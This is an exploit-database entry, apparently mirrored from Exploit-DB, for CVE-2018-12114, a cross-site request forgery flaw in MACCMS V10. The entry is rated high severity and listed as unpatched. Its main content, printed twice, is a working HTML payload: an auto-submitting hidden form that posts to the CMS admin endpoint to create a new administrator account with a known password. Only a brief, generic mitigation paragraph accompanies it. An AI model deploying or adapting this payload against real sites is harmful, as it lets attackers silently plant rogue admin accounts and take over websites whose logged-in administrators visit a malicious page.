header-logo
Suggest Exploit
vendor:
MACCMS_V10
by:
bay0net
8.8
CVSS
HIGH
CSRF
352
CWE
Product Name: MACCMS_V10
Affected Version From: V10
Affected Version To: V10
Patch Exists: NO
Related CWE: CVE-2018-12114
CPE: a:maccms:maccms_v10
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=137617https://www.infosecmatter.com/nessus-plugin-library/?id=137024https://www.infosecmatter.com/nessus-plugin-library/?id=140499
Platforms Tested: None
2018

MACCMS_V10 CSRF vulnerability add admin account

I found a CSRF vulnerability in maccms_v10,this vulnerability can be arbitrarily added to users. The payload for attack is as follows: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST"> <input type="hidden" name="admin_id" value="" /> <input type="hidden" name="admin_name" value="test2" /> <input type="hidden" name="admin_pwd" value="test2" /> <input type="hidden" name="admin_status" value="1" /> <input type="hidden" name="admin_auth[0]" value="index/welcome" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Mitigation:

The best way to mitigate CSRF attacks is to use a combination of both server-side and client-side security measures. Server-side measures include using a unique token for each request, which is validated on the server. Client-side measures include using a same-site cookie flag, which prevents the cookie from being sent in cross-site requests.
Source

Exploit-DB raw data:

# Exploit Title: MACCMS_V10 CSRF vulnerability add admin account
# Date: 2018-06-11 
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9168309.html
# Software Link: http://www.maccms.com/down.html
# Version: V10
# CVE : CVE-2018-12114


I found a CSRF vulnerability in maccms_v10,this vulnerability can be arbitrarily added to users.


The payload for attack is as follows.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
      <input type="hidden" name="admin_id" value="" />
      <input type="hidden" name="admin_name" value="test2" />
      <input type="hidden" name="admin_pwd" value="test2" />
      <input type="hidden" name="admin_status" value="1" />
      <input type="hidden" name="admin_auth[0]" value="index/welcome" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR